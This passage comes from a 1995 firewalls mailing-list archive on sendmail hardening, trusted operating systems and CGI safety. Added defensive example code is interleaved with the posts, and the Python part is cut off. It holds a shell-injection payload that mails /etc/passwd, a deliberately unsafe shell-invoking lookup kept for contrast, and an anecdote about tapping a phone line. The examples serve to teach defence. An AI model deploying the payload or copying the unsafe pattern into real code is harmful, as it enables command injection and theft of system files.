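    return 1;
}

/* Fill an argv for execv. Each string is exactly one argument, so a
 * metacharacter in it is data for sendmail, not syntax for a shell.
 * Returns the argument count, or -1 if the array is too small. */
int build_sendmail_argv(const char *argv_out[], size_t max,
                        const char *from, const char *to)
{
    if (max < 5) return -1;
    argv_out[0] = "/usr/lib/sendmail";   /* assumed path */
    argv_out[1] = "-f";
    argv_out[2] = from;
    argv_out[3] = to;
    argv_out[4] = NULL;
    return 4;
}

/* The hardened version: validate both addresses, then fork and execv
 * sendmail with stdin redirected from the temp file. Returns sendmail's
 * exit status, or -1 if the input was refused or something failed. */
int send_without_shell(const char *from, const char *to, const char *tempname)
{
    const char *argv[5];
    pid_t pid;
    int fd, status;

    if (!is_safe_address(from) || !is_safe_address(to)) return -1;
    if (build_sendmail_argv(argv, 5, from, to) < 0) return -1;
    fd = open(tempname, O_RDONLY);
    if (fd < 0) return -1;
    pid = fork();
    if (pid < 0) { close(fd); return -1; }
    if (pid == 0) {
        dup2(fd, STDIN_FILENO);
        close(fd);
        execv(argv[0], (char *const *)argv);
        _exit(127);                 /* exec failed; never fall back to a shell */
    }
    close(fd);
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed input: the payload from the message used as the address. */
    const char *payload = "; mail phreak < /etc/passwd";
    char cmd[256];

    build_shell_command(cmd, sizeof cmd, payload, "webmaster@example.com", "/tmp/msg.1");
    printf("the shell would run: %s\n", cmd);
    printf("metacharacters: %d  safe address: %d\n",
           contains_shell_metachar(payload), is_safe_address(payload));
    printf("hardened send returned: %d\n",
           send_without_shell(payload, "webmaster@example.com", "/tmp/msg.1"));
    return 0;
}
```

Run as is, the first line of output is the command the original script would have given to the shell: sendmail gets an empty -f, the ';' ends that command, and "mail phreak < /etc/passwd ..." runs as a second one. The hardened path refuses the payload at the address check; even if the check were weaker, execv passes the whole string as one argument to sendmail and there is no shell in the picture to split it.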
From firewalls-owner Thu Sep 14 14:02:44 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA27272 for firewalls-outgoing; Thu, 14 Sep 1995 13:24:46 -0700 Received: from psisa.com ([198.3.200.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA27224 for ; Thu, 14 Sep 1995 13:24:26 -0700 Received: (from chk@localhost) by psisa.com (8.6.12/guess) id PAA25817; Thu, 14 Sep 1995 15:21:29 -0500 Message-Id: <199509142021.PAA25817@psisa.com> Subject: Re: Secure version of Sendmail To: James_Dehnert@optilink.optilink.dsccc.com Date: Thu, 14 Sep 1995 15:21:29 -0500 (CDT) Cc: firewalls@GreatCircle.COM In-Reply-To: <9509140842.ZM5969@earth.optilink.dsccc.com> from "James_Dehnert@optilink.optilink.dsccc.com" at Sep 14, 95 08:42:00 am From: chk@psa.pencom.com (Christian Kuhtz) X-Mailer: ELM [version 2.4 PL24] Content-Type: text Content-Length: 1130 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

> Hear, hear! I use smail on all our machines. My basic config file is about
> 10 lines long. I have it up to 20 to do things a bit more uniformly but 10
> lines does all I need.
>
> The way I look at it, the easier it is to configure, the less chance you're
> going to screw it up. It has also passed all the tests I have given it based
> on known sendmail problems.

Yeah, that goes well as long as you don't need to mess around with the rulesets, which you can't reach via config files in Smail (and that's what was intended). So, in really messed up (real :) constellations, you don't get very far with Smail. I know both and there are places where Smail does the job just fine and Sendmail V8 is an overkill, but most of the times I need Sendmail V8. I guess, most of the times I'm just a poor son of a bitch ending up in messy environments :).
Best Regards, Chris --___ ____ __ | _ \/ __/| \ Christian Kuhtz "And dsmit hailed: | _/\__ \| \ \ Pencom Systems Administration Services We shall smit thou |_| /___/|_|__\ on-site at IBM, Gov't Services, Boulder, CO forever!"

From firewalls-owner Thu Sep 14 14:17:46 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA27342 for firewalls-outgoing; Thu, 14 Sep 1995 13:25:14 -0700 Received: from gatekeeper2.mcimail.com (gatekeeper2.mcimail.com [192.147.45.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA27311 for ; Thu, 14 Sep 1995 13:25:04 -0700 Received: from mailgate2.mcimail.com (mailgate2.mcimail.com [166.38.40.100]) by gatekeeper2.mcimail.com (8.6.12/8.6.10) with SMTP id UAA08876; Thu, 14 Sep 1995 20:23:30 GMT Received: from mcimail.com by mailgate2.mcimail.com id ae25776; 14 Sep 95 20:22 WET Date: Thu, 14 Sep 95 15:20 EST From: Henry Lemon To: firewalls Subject: Rogue Internet connection Message-Id: <54950914202045/0003668858PL1EM@MCIMAIL.COM> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

---------------------------------- ATTACHMENT ---------------------------------- DATE: Thu Sep 14, 1995 4:21 pm SUBJECT:Research WWW

Until recently I was under the impression that our organization did not have Internet access. I recently discovered that one department has established a home grown network link. Forget about security policies. That won't happen until we crash and burn. Please evaluate this scenario for me. What are our risks? If the responses are appropriate for the list, please email directly.

A PC was configured to serve modems to the local area network for dial-out service only, using software from Synergy Solutions called Modem Assist Plus. This software, which consists of both a client and server portion allows for transparent PC communications(COM) port redirection.
It does this by capturing all data intended for the PC's COM port and bundling it into NetBIOS messages and sending them to the Server PC. This data is then unpacked and sent to one of the attached modems. The server in turn bundles any data it receives into NetBIOS messages and sends the data back to the client. This permits any PC based communication program to transparently access the modems on the Modem Server. Requests for modems are queued by the server and users are notified of the availability of a modem so that they can either wait in the queue or try to access a modem later. The client portion of the software is Windows based so that DOS conventional memory requirements are not a factor.

Access to the internet is provided through CompuServe Inc.'s PPP/SLIP access using their WINSOCK.DLL. This WINSOCK is pre-configured to work properly with CompuServe's PPP/SLIP servers. All users access the same PPP/SLIP account. The modems and server are accessible from 6 A.M. to 6 P.M. Monday through Friday. The server and modems are on a timer that cuts the power at all other times. This was done to dissuade users from abusing the service. Currently the system will support four simultaneous connections. We have purchased a 50 seat network license to use Netscape Navigator for accessing the World Wide Web, newsgroups, ftp sites, and email.

TIA Henry Lemon Opinions expressed are mine Aristech Chemical Corp. and not those of my employer 600 Grant St.
Room 930 Pittsburgh PA 15201 LEMONH%A1%Aristech_Chemical_Corporation@mcimail.com

From firewalls-owner Thu Sep 14 15:03:55 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA03596 for firewalls-outgoing; Thu, 14 Sep 1995 14:57:36 -0700 Received: from gatekeeper.alcatel.com.au (gatekeeper.alcatel.com.au [203.17.66.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA03587 for ; Thu, 14 Sep 1995 14:57:29 -0700 Received: from 139.188.22.50 (139.188.22.50) by gatekeeper.alcatel.com.au (PMDF V5.0-4 #11861) id <01HVAQ8IF7KW0000LS@gatekeeper.alcatel.com.au> for firewalls@greatcircle.com; Fri, 15 Sep 1995 07:54:33 +1000 Received: from gsms01.alcatel.oz.au (gsms01.alcatel.oz.au) by cbd.alcatel.oz.au (PMDF V5.0-3 #9241) id <01HVAQ9W84C09OD836@cbd.alcatel.oz.au> for firewalls@greatcircle.com; Fri, 15 Sep 1995 07:55:40 +1000 Received: (from jeremyp@localhost) by gsms01.alcatel.oz.au (8.6.12/8.6.12) id HAA22775 for firewalls@greatcircle.com; Fri, 15 Sep 1995 07:55:53 +1000 Date: Fri, 15 Sep 1995 07:55:53 +1000 From: Peter Jeremy Subject: Re: Secure version of Sendmail To: firewalls@greatcircle.com Message-id: <199509142155.HAA22775@gsms01.alcatel.oz.au> Content-transfer-encoding: 7BIT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Rick writes:
> The purpose of nonbypassable
>access control mechanisms like Type Enforcement is to prevent the
>inevitable bugs from allowing instant and complete compromise of the
>system.

What if the bugs are in the Type Enforcement code? I agree that running Sendmail V8 on a B1 OS (or something similar) is more secure than . But it does not guarantee that there isn't a gaping hole in the OS which lets you obtain sufficient access to wipe the audit trails and bypass the compartmentalisation (does such a word exist?).

Peter.
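Mark Riggins' reply earlier in this thread said the CGI should run in a chroot jail as a bare minimum, and Peter's point just above is that the layer underneath can have holes of its own. A jail is only as good as what cannot be done from inside it, and the usual way to lose that property is a privilege drop done in the wrong order or not at all. The block below is an added example for this archive, not code from the thread or from any vendor named in it. It is a minimal jail wrapper that checks the request, enters the chroot, drops group and user ids in the right order, verifies that root cannot be regained, and only then execs the program. The jail directory /var/cgi-jail, the program path /cgi-bin/mailform inside it and the identity 65534:65534 are assumptions made for the example.

```c
/* Added example, not code from this thread or from any product named in
 * it. A minimal jail wrapper for a CGI program, showing the order of the
 * privilege drop and a check that it actually took. Assumptions: the jail
 * is /var/cgi-jail, the program is /cgi-bin/mailform inside it, and the
 * unprivileged identity is 65534:65534. */
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <errno.h>
#include <grp.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* Policy on the request itself: absolute path, not "/", no ".." anywhere,
 * and a non-root target identity. A jail that keeps uid 0 is no jail:
 * root inside a chroot can chroot again and walk back out. */
int jail_request_ok(const char *dir, uid_t uid, gid_t gid)
{
    if (dir == NULL || dir[0] != '/' || strcmp(dir, "/") == 0) return 0;
    if (strstr(dir, "..") != NULL) return 0;
    if (uid == 0 || gid == 0) return 0;
    return 1;
}

/* Enter the jail. Order matters: chroot first, then chdir("/") so the
 * working directory is inside the new root, then drop supplementary
 * groups, then gid, then uid (setgid needs root, so it goes before
 * setuid). Returns 0, or -1 with errno set; needs root to start. */
int enter_jail(const char *dir, uid_t uid, gid_t gid)
{
    if (!jail_request_ok(dir, uid, gid)) { errno = EINVAL; return -1; }
    if (geteuid() != 0) { errno = EPERM; return -1; }
    if (chroot(dir) != 0) return -1;
    if (chdir("/") != 0) return -1;
    if (setgroups(0, NULL) != 0) return -1;
    if (setgid(gid) != 0) return -1;
    if (setuid(uid) != 0) return -1;
    return 0;
}

/* Verify the drop: real and effective ids match the target and setuid(0)
 * now fails. Returns 1 only when root cannot be regained by this process. */
int privileges_dropped(uid_t uid, gid_t gid)
{
    if (getuid() != uid || geteuid() != uid) return 0;
    if (getgid() != gid || getegid() != gid) return 0;
    if (setuid(0) == 0) return 0;       /* still root: the drop failed */
    return 1;
}

/* Jail, verify, exec. argv[0] is a path relative to the jail root.
 * Only returns on failure, with errno set. */
int run_in_jail(const char *dir, uid_t uid, gid_t gid, char *const argv[])
{
    if (enter_jail(dir, uid, gid) != 0) return -1;
    if (!privileges_dropped(uid, gid)) { errno = EPERM; return -1; }
    execv(argv[0], argv);
    return -1;
}

int main(void)
{
    /* Constructed invocation; succeeds only when started as root with the
     * jail directory and program in place. */
    char *const argv[] = { "/cgi-bin/mailform", NULL };

    if (run_in_jail("/var/cgi-jail", 65534, 65534, argv) != 0)
        perror("run_in_jail");
    return 1;
}
```

The wrapper refuses a request that would leave the program as uid 0, because then the chroot adds nothing. What it cannot do is anything about a hole in the kernel under it, which is Peter's point: the jail narrows what a broken CGI can reach, it does not make the lower layer correct.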
From firewalls-owner Thu Sep 14 16:36:24 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA08129 for firewalls-outgoing; Thu, 14 Sep 1995 16:10:22 -0700 Received: from upgrade.com (upgrade.com [199.174.17.53]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA08115 for ; Thu, 14 Sep 1995 16:10:16 -0700 Received: from upgrade.com ([127.0.0.1]) by upgrade.com (8.6.12/8.6.12) with ESMTP id TAA16907; Thu, 14 Sep 1995 19:07:40 -0400 Message-Id: <199509142307.TAA16907@upgrade.com> To: Scott Barman cc: FIREWALLS Subject: Re: Firewall off Mortal Kombat XIV In-reply-to: Your message of "Thu, 14 Sep 1995 13:00:09 EDT." Date: Thu, 14 Sep 1995 19:07:39 -0400 From: Christopher Nielsen Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

On Thu, 14 Sep 1995 13:00:09 -0400 (EDT) Scott Barman wrote:
--------
>> *Will* erode?? What makes you think it hasn't already. Even being in
>> the DC area where there are more spooks per capita than any place else
>> in the US, I have seen more companies with stronger facility
>> security policies (where the policy is see the receptionist at the
>> front desk before being allowed in) than I have with network policy.
>> I mean I even had one person ask me "what's all the fuss being made
>> about security?"

This same kind of thing has happened to me. We now have security guards at our front desk as opposed to just a locked door, but our network and system security is laughable. When I was hired, nearly everyone in the entire organization had the root password and did a large part of their work as root. That has changed since, but people were very unhappy about it. What's worse than people not understanding is when upper management listens to what you have to say, pays you lip service, and then ignores your suggested changes and requests for needed equipment or staff.

>> One day I borrowed a test set from a friend who does telecom consulting
>> (putting systems in offices, etc.).
>> He said that one could pick this
>> item up at a Radio Shack for around $30. Basically, it had two wires
>> with alligator clips, an LCD readout (one line, 35 characters), and an
>> RS-232 port. After going through this "what do you need encryption for"
>> I gathered the participants and went on a little field trip:

When I suggested encrypted network connections, I was almost laughed out of the office. The CIO thought I was taking illicit drugs and being very paranoid.

>> I found the box where the telco wires met the building. All I did to
>> open the box was bang it with my fist once. Since I did learn something
>> when I was a consultant at Bellcore and AT&T (I also asked my friend to
>> show me how the unit worked), I attached the clips to the company's PPP
>> line out (no, it's not the company where I am now). I was reading the
>> traffic with little problem. The display gave me a snapshot of traffic,
>> but I reminded them that I could attach a PC to the RS-232 port and
>> capture EVERYTHING.

Maybe I should try this, too...

>> It took the politically correct equivalent of bashing their heads in to
>> show them that they needed to secure things. And this is a company
>> whose people wear badges that are also key cards to access the
>> building! Then I sat down at their machine to find it had the sendmail
>> debug bug, allowed NFS mounts to root for anyone, had a '+' in the
>> /etc/hosts.equiv file and a ton of non-local hosts in /etc/hosts
>> (because the sys admin didn't understand how to properly configure a DNS
>> and/or the resolver), and so on.

Sounds all too familiar...

>> Then someone else (sorry, I didn't save it to give proper attribution)
>> wrote about these programmers doing neat and nifty things but their
>> programs require root to run.

That was me. =)

>> Part of the problem, as has been sort of stated, is the background of
>> those now entering the industry.
>> When I interview people for entry
>> level jobs, I hear about what they learn in school and am shocked about
>> some of the things they do not teach! Now I didn't go to a high-powered
>> computer science school (I started my college career as a music ed.
>> major), but I came out with a better understanding of some of the
>> more technical issues of what I do, including security basics! I mean I
>> have a hard time understanding why these kids do not have a basic
>> understanding of what is going on behind those database engines or even
>> a basic concept of ISAM in order to explain it! Without trying to make
>> myself sound old, who's teaching this stuff nowadays?

Well, being one that is still in school, I can say that they don't teach you anything that pertains to the real world. Everything I have learned about systems/network security has been through experience and self-teaching.

>> "Micro$oft and Windoze/NT will be the cause of the de-evolution of
>> network security just as the original PC and BASIC was the cause of
>> the de-evolution of programming."

If only my co-workers would understand this.
=) -Chris =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Christopher Nielsen UCA&L System and Network Administrator Buffalo, New York (nielsenc@upgrade.com) #include

From firewalls-owner Thu Sep 14 17:00:58 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA09287 for firewalls-outgoing; Thu, 14 Sep 1995 16:26:46 -0700 Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id QAA09272 for ; Thu, 14 Sep 1995 16:26:41 -0700 Received: from pm1-12.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA22978; Thu, 14 Sep 95 18:24:45 -0400 Date: Thu, 14 Sep 95 18:24:45 -0400 Message-Id: <9509142224.AA22978@su1.in.net> X-Sender: frankw@in.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Peter da Silva From: frankw@in.net (Frank Willoughby) Subject: Re: Secure version of Sendmail Cc: smith@sctc.com, firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

> The point is that if you have a class B O/S you're more likely to skimp
> on the application level stuff. If you get both, that's great, but you
> usually only get one.

I've seen this happen, too. This is why NCSC formal evaluation is too often irrelevant. If a trusted system is performing a security service, then the application software is often configured to circumvent the standard security measures in some places. This is OK if it's done right, and a huge problem if it's done wrong.

Security is a property of overall system behavior. It's bad news to assume a platform can do it all for you, or that an application can do it all. The best defense needs them to work together. On the SNS Mail Guard the government evaluated the whole thing including the networking and application software.

Rick.
smith@sctc.com secure computing corporation

From firewalls-owner Thu Sep 14 17:03:37 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA09129 for firewalls-outgoing; Thu, 14 Sep 1995 16:25:51 -0700 Received: from dcc.com ([204.147.95.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA09107 for ; Thu, 14 Sep 1995 16:25:44 -0700 Received: by gateway.dcc.com id <58881>; Thu, 14 Sep 1995 18:32:30 -0500 From: "Moubray, Steve" To: "'firewalls@greatcircle.com'" Subject: Re: IPX firewall? Date: Thu, 14 Sep 1995 20:19:00 -0500 Encoding: 63 TEXT X-Mailer: Microsoft Mail V3.0 Message-Id: <95Sep14.183230cdt.58881@gateway.dcc.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Rumor has it that the following was stated:
--------
:From: Andrew Foss
:Date: Tue, 12 Sep 1995 14:02:23 -0700
:Subject: Re: IPX firewall?
:
:At 08:23 AM 9/12/95 -0700, Bradley E. Hubbard wrote:
:>
:>Hello,
:>
:>I'm wondering if anyone knows of any firewall products that have been
:>developed in and for an IPX environment?
:Internet Junction(recently purchased by Cisco) has a gateway that converts
:IPX to IP. It's available for Solaris, HP-UX, IRX ...
:It has the advantage of not putting TCP stacks on the IPX clients, but it's
:not the right solution for many people.
:1. TCP stacks are now free and Win95 and all that jive from Redmond will
:have it included.
:2. The IJ product still requires a dll on all the PC's.
:3. Compatibility in gatewaying the 2 unlike protocols seems to be a
:continual challenge.
:4. It has to run as an application on a machine which will need to be
:adequately secured itself.
:5. Performance is limited.
:
:I don't want to offend anyone, but I think the right solution is just let
:the IPX clients live in the IP world as opposed to trying to gateway their
:protocols.
:>
:>Thanks in advance,
:>
:>Brad Hubbard
:>behubba@rssi.com
:>
:>
:Andrew Foss Tel. 415/494-NETS(6387)
:Network Translation Inc. Dir.
:415/855-0725
:1901 Embarcadero Rd. FAX 415/424-9110
:Palo Alto, CA 94303 email :afoss@translation.com
: web www.translation.com

Instant Internet offers a dedicated IPX to IP gateway that is similar to the Internet Junction package but doesn't require a dedicated WS. It comes in its own little chassis (it's actually an Intel PC inside without a monitor or keyboard port). It functions with most WINSOCK based software. The reason I say most is because they have written their own WINSOCK.DLL that talks IPX instead of IP. It is a great solution for some Novell sites but I'm not sure about performance at big sites. This doesn't do much for sites that are running IP everywhere and need to ensure software compatibility from many different platforms but it is a nice product in the Novell market.

-------------------------------------------------- Steve Moubray DCC, Inc. 10 2nd Street NE, Minneapolis, MN 55413 (612) 378-4469 Fax (612) 378-4401 smoubray@dcc.com http://www.dcc.com/

From firewalls-owner Thu Sep 14 17:10:49 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA09283 for firewalls-outgoing; Thu, 14 Sep 1995 16:26:43 -0700 Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id QAA09251 for ; Thu, 14 Sep 1995 16:26:36 -0700 Received: from pm1-12.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA22975; Thu, 14 Sep 95 18:24:43 -0400 Date: Thu, 14 Sep 95 18:24:43 -0400 Message-Id: <9509142224.AA22975@su1.in.net> X-Sender: frankw@in.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Rick Smith From: frankw@in.net (Frank Willoughby) Subject: Re: Secure version of Sendmail Cc: firewalls@GreatCircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

>On the SNS Mail Guard the government evaluated the whole thing
>including the networking and application software.
The implication in the above statement is that the Mail Guard functions as a firewall. Not True. The SNS Mail Guard does *not* function as a firewall. It has another purpose.

I was told by a salesman who represented the Sidewinder that it was blessed by the gov't powers-that-be as *the* gov't sanctioned firewall. Hogwash. This was a gross misrepresentation of the product that took some time and research to unearth. Sorry that I can't give out further details, but I will vehemently oppose any claims that the Mail Guard is a firewall - Internet or otherwise. I was taken in by this hype (at first), and I will do my best to prevent the same from happening to others.

Sorry about the tone of this letter, but gross misrepresentation of a product gets my dander up. There are many good firewall vendors out there. It isn't necessary to misrepresent a product in order for it to sell - particularly in the (justified) paranoia of CEO's & CIO's who break into a cold sweat at the thought of doing business on the Internet. Stick to the truth & a customer will always listen to what you have to say.

This letter wasn't intended as a flame or a personal attack or anything. I was just trying to correct a well-publicized myth and hope I succeeded to a small degree.

Best Regards, Frank

> >Rick.
>smith@sctc.com secure computing corporation
>
>
>

From firewalls-owner Thu Sep 14 18:32:45 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA15880 for firewalls-outgoing; Thu, 14 Sep 1995 18:22:24 -0700 Received: from uuneo.neosoft.com (uuneo.neosoft.com [206.109.1.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id SAA15873 for ; Thu, 14 Sep 1995 18:22:20 -0700 Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.6.10/8.6.10) with UUCP id UAA01900 for GreatCircle.COM!firewalls; Thu, 14 Sep 1995 20:18:00 -0500 Received: by ris1.nmti.com (smail2.5) id AA18914; 14 Sep 95 18:01:23 CDT (Thu) Received: by sonic.nmti.com; id AA11925; Thu, 14 Sep 1995 18:28:05 -0500 From: peter@nmti.com (Peter da Silva) Message-Id: <9509142328.AA11925@sonic.nmti.com.nmti.com> Subject: Re: Firewall off Mortal Kombat XIV To: william.wells@damark.com (william.wells) Date: Thu, 14 Sep 1995 18:28:05 -0500 (CDT) Cc: firewalls@GreatCircle.COM In-Reply-To: <9509141817.AA20648@damark.com> from "william.wells" at Sep 14, 95 01:12:00 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 1089 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

> As an example, it amazes me that UNIX, which predates some
> proprietary systems, STILL doesn't understand what a labeled tape is
> and is unable to automatically associate which of several jobs wants
> to use a labeled tape which was just mounted on any drive. Any operations
> manager who deals with UNIX systems would love to get that.

On the other hand, I've beat myself against the wall on systems that support labelled tapes trying to get them to read a foreign tape without messing with the data. Or even get them to accept a foreign tape at all. UNIX has a solid layered I/O system for disks... you just need to do the same thing for tapes and you'll be set. Just don't get rid of rmt when you create mt/label...
> So, put security in the kernel: hopefully it will work right. Split
> privileges into more than "root" or "not-root"; allow ACLs, etc. Maybe
> it will work properly in a multi-vendor environment.

I'm not convinced that ACLs enhance security. They make some things easier, but they can also confuse the hell out of users. Confused users tend to do dumb things.

From firewalls-owner Thu Sep 14 21:00:05 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA19637 for firewalls-outgoing; Thu, 14 Sep 1995 20:45:22 -0700
Received: from gateway.sctc.com (gateway.sctc.com [192.55.214.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id UAA19630 for ; Thu, 14 Sep 1995 20:45:18 -0700
Received: from sccmailhost.sctc.com (sccmailhost.sctc.com [192.55.214.100]) by gateway.sctc.com (8.6.10/8.6.9) with SMTP id WAA04621; Thu, 14 Sep 1995 22:46:20 -0500
Received: from sccmailhost.sctc.com by sccmailhost.sctc.com id 066920000; 14 Sep 95 23:43 CDT
Received: from sctc.com by sccmailhost.sctc.com id 114250000; 14 Sep 95 23:42 CDT
Received: from hector.sctc.com (hector.sctc.com [172.17.192.85]) by spirit.sctc.com (8.6.12/8.6.10) with ESMTP id WAA13551; Thu, 14 Sep 1995 22:42:36 -0500
Received: (from stockwel@localhost) by hector.sctc.com (8.6.12/8.6.9) id WAA12718; Thu, 14 Sep 1995 22:42:33 -0500
Date: Thu, 14 Sep 1995 22:42:33 -0500
From: Ted Stockwell
Message-Id: <199509150342.WAA12718@hector.sctc.com>
To: Frank Willoughby
CC: firewalls@GreatCircle.COM
Subject: Re: Secure version of Sendmail
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> Date: Thu, 14 Sep 95 18:24:43
> From: Frank Willoughby
> Cc: firewalls@GreatCircle.COM
>
> >On the SNS Mail Guard the government evaluated the whole thing
> >including the networking and application software.
>
> The implication in the above statement is that the Mail Guard
> functions as a firewall. Not True. The SNS Mail Guard does
> *not* function as a firewall.
>
> It has another purpose.
> I was told by a salesman who represented
> the Sidewinder that it was blessed by the gov't powers-that-be as
> *the* gov't sanctioned firewall. Hogwash. This was a gross mis-
> representation of the product that took some time and research to
> unearth.

[rest of complaint deleted]

It is not clear to me what your bone of contention is. SNS is not designed to compete directly against traditional internet firewalls. It does have much in common with more conventional firewalls and the SNS effort had a considerable influence on the design of Sidewinder -- Secure Computing's firewall for the traditional internet firewall market.

There is information on our web server (http://www.sctc.com) about the SNS program and the LOCKguard(tm) Standard Mail Guard (SMG). I would suggest people start there when wondering what SNS is and isn't.

--
disclaimer: I speak only for myself, etc, etc
Ted Stockwell, stockwel@sctc.com, Sidewinder

From firewalls-owner Thu Sep 14 21:02:44 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA19560 for firewalls-outgoing; Thu, 14 Sep 1995 20:37:25 -0700
Received: from uuneo.neosoft.com (uuneo.neosoft.com [206.109.1.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id UAA19553 for ; Thu, 14 Sep 1995 20:37:22 -0700
Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.6.10/8.6.10) with UUCP id WAA16836 for GreatCircle.COM!firewalls; Thu, 14 Sep 1995 22:33:52 -0500
Received: by ris1.nmti.com (smail2.5) id AA21735; 14 Sep 95 20:12:09 CDT (Thu)
Received: by sonic.nmti.com; id AA18846; Thu, 14 Sep 1995 20:38:40 -0500
From: peter@nmti.com (Peter da Silva)
Message-Id: <9509150138.AA18846@sonic.nmti.com.nmti.com>
Subject: Re: Secure version of Sendmail
To: mdr@vodka.sse.att.com
Date: Thu, 14 Sep 1995 20:38:40 -0500 (CDT)
Cc: peter@nmti.com, firewalls@GreatCircle.COM
In-Reply-To: <9509141939.AA05853@ig2.att.att.com> from "mdr@vodka.sse.att.com" at Sep 14, 95 03:39:46 pm
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Content-Length: 1713
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> Yea right, I'm gonna go to the trouble of finding and administering a
> class B OS but I don't care enough about security to fix the application
> level bugs.

You probably won't. The application writers will say "we don't need to check this stuff, the OS will do it for us". Don't tell me they won't... I've been porting code from O/S to O/S over the past 20 years now, and every piece of code is full of assumptions like "memory allocation always succeeds", or "I can pass a pointer to another process", or whatever the handy shortcuts they're used to are. This is more of the same.

So sendmail won't be able to break out of the "jail". But it's gotta have privileges to open network connections inside the firewall, so while your B1 system remains uncompromised it's turned from a wall into a door.

You'll get some short term security, while you're running apps written for C1 under B, but the application writers will get lazy. They always do. The code I gave you is an example. The guy who wrote it said "hey, the www server is running unprivileged. I'm using shadow passwords. What can they do?"

> And you don't see the need for a secure OS underneath your CGI
> scripts?

I see a need for secure CGI scripting languages. If the language has no mechanism to run another program, it's a lot safer. If the guy running the system thinks it doesn't matter because it's running in a jail, he's going to screw himself over sooner or later.

This is the thing that worries me about Java. Rather than making it a toy language with simple, well-defined semantics (like HTML, for example, or a pure Postscript without any graphics or I/O) they depend on security checks. That seems inherently more dangerous.
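Peter's CGI point, as an added example that is not part of the original post or of any code discussed in the thread: the same user lookup written the way his "the www server is running unprivileged" acquaintance would write it (the request value is pasted into a command line and handed to a shell) and the in-process form that his "no mechanism to run another program" argument points at. The directory, the account names, the `finger` command line and the `user=` query parameter are all constructed for the example.

```python
"""CGI lookup written two ways, to show why the uid the server runs under
(or the jail around it) does not fix an application bug.

Added example; not code from the thread. The directory contents, account
names and the finger command line are constructed for illustration.
"""
import re
import subprocess
from typing import Optional, Set, Tuple
from urllib.parse import parse_qs

# Constructed sample directory standing in for the backend (finger, a passwd
# file, a database) that a real lookup script would consult.
USER_DIRECTORY = {
    "alice": "Alice Example, room 101, ext. 1234",
    "bob": "Bob Example, room 102, ext. 1235",
}

# A plain account name is the only legitimate input for this lookup.
VALID_USERNAME = re.compile(r"\A[a-z_][a-z0-9_-]{0,31}\Z")

# Characters the Bourne shell interprets. If a request value carrying any
# of these reaches a shell, the request controls the command line, and the
# only limit is what the server's uid may do, inside the jail or not.
SHELL_METACHARS = set(";|&$`<>()'\"\\\n*?[]{}~ \t")


def lookup_via_shell(user: str) -> str:
    """The pattern the post criticises: build a command line from the
    request and hand it to a shell. Kept for contrast only; never called."""
    return subprocess.run("finger " + user, shell=True,
                          capture_output=True, text=True).stdout


def shell_risky_chars(user: str) -> Set[str]:
    """Shell metacharacters present in a request value: the ones that turn
    lookup_via_shell from a lookup into arbitrary command execution."""
    return set(user) & SHELL_METACHARS


def lookup_in_process(user: str) -> Optional[str]:
    """Hardened form: accept only the narrow grammar of an account name and
    answer from in-process data. No other program is run, so there is
    nothing for hostile input to escape into."""
    if not VALID_USERNAME.match(user):
        return None
    return USER_DIRECTORY.get(user)


def handle_cgi(query_string: str) -> Tuple[int, str]:
    """Minimal CGI-style handler: parse QUERY_STRING, look the user up and
    return (status, body) without touching a shell. Malformed and unknown
    names get the same answer, so the response says nothing about why."""
    params = parse_qs(query_string, keep_blank_values=True)
    users = params.get("user", [])
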